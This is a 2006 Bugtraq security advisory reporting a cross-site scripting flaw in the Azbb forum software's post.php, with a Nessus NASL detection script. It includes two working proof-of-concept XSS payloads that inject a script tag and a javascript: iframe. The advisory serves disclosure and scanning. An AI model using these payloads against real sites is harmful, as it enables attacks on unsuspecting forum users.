[42480] in bugtraq

home help back first fref pref prev next nref lref last post

Azbb v1.1.00 Cross-Site Scripting

daemon@ATHENA.MIT.EDU (roozbeh_afrasiabi@yahoo.com)
Sat Jan 28 00:51:09 2006

Date: 23 Jan 2006 01:43:40 -0000
Message-ID: <20060123014340.17922.qmail@securityfocus.com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
From: roozbeh_afrasiabi@yahoo.com
To: bugtraq@securityfocus.com

[KAPDA::#22] - Azbb v1.1.00 Cross Site Scripting

KAPDA New advisory

Vulnerable products : Azbb <= 1.1.00
Vendor:  www.azbb.org
Risk: Low
Vulnerabilities: Cross Site Scripting

Date :
--------------------
Found : Jan 20 2006
Vendor Contacted : Jan 21 2006
Release Date : Jan 21 2006

About :
--------------------
AZbb is "a forum that was written with a primary focus on security.
AZbb does not require a database such as MySQL, PostgreSQL or MSSQL and can even be used as a blog, or a portal".


Vulnerability:
--------------------
Cross_Site_Scripting (XSS,CSS):

AZ Bulletin Board is affected by a cross-site scripting vulnerability.
This issue is due to the failure of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker to create a malicious link containing script code that will be executed in the browser of an unsuspecting user when followed.


PoC :
--------------------

1)

This flaw exists because the application does not validate the "name" variable upon submission to the post.php script via the POST method.

h**p://www.[target]/post.php   name="><script>alert('XSS')</script><!--



2)[limited XSS]

h**p://www.[target]/post.php?topic=>"<br><iframe%20src=javascript:alert()><br>"


NASL :
--------------------
azbb_1100_XSS.nasl
#
#  This script was written by Pedram Hayati <pi3ch at kapda dot ir>
#  (C) KAPDA Computer Security Science Researchers Institute
#   http://www.kapda.ir
#
#  This script is released under the GNU GPL v2

if(description)
{
script_version ("$Revision: 1.0 $");
name["english"] = "Azbb XSS";

script_name(english:name["english"]);

desc["english"] = "
The 'AZ Bulletin Board' PHP is installed. This version is affected by a
cross-site scripting vulnerability. This issue is due to a failure
of the application to properly sanitize user-supplied input.

As a result of this vulnerability, it is possible for a remote attacker
to create a malicious link containing script code that will be executed
in the browser of an unsuspecting user when followed.
Original Advisory: http://kapda.ir/advisory-236.html
Solution : Vendor contacted
Risk factor : Low";

script_description(english:desc["english"]);

summary["english"] = "Checks post.php XSS";

script_summary(english:summary["english"]);

script_category(ACT_GATHER_INFO);


script_copyright(english:"This script is Copyright (C) 2006 Pedram Hayati");

family["english"] = "CGI abuses : XSS";
family["francais"] = "Abus de CGI";
script_family(english:family["english"], francais:family["francais"]);
script_dependencie("cross_site_scripting.nasl");
script_require_ports("Services/www", 80);
exit(0);
}

#
# The script code starts here
#

include("http_func.inc");
include("http_keepalive.inc");

port = get_http_port(default:80);

if (!get_port_state(port))exit(0);

if ( get_kb_item("www/" + port + "/generic_XSS") ) exit(0);

foreach dir (cgi_dirs())
{
req = string(dir, "/post.php?topic=>\"<br><iframe%20src=javascript:alert()><br>\" [XSS]");
req = http_get(item:req, port:port);
r = http_keepalive_send_recv(port:port, data:req, bodyonly:1);
if( r == NULL )exit(0);
if (egrep(pattern:"javascript:alert()", string:r))
{
     security_warning(port);
     exit(0);
}
}
exit(0);

Solution :
--------------------
N/A

Original Advisory :
--------------------
http://kapda.ir/advisory-236.html

Credit :
--------------------
Discoverd by Roozbeh Afrasiabi
roozbeh_afrasiabi {a] yahoo.com
black_death {a] kapda.ir
www.persiax.com [currently down]

NASL Script by pi3ch {a] kapda.ir
KAPDA - Institute for Computer Security Researchers
http://www.KAPDA.ir

home help back first fref pref prev next nref lref last post